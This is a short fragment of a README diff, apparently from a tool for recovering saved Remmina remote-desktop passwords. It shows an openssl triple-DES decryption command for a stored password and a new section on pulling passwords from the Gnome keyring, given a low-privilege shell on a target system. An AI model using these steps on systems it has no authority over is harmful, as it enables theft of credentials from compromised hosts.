billchaison/RemmiRip/README.md

 echo -n $EPW | xxd -r -p | openssl enc -des3 -nosalt -nopad -K "${KIV[0]}" -iv "${KIV[1]}" -d | hexdump -Cv
 ```

+## Method for recovering passwords from Gnome keyring

 **Step 1**

 The assumption is that you already have a low-priv shell as some user on the target system that has Remmina configuration files.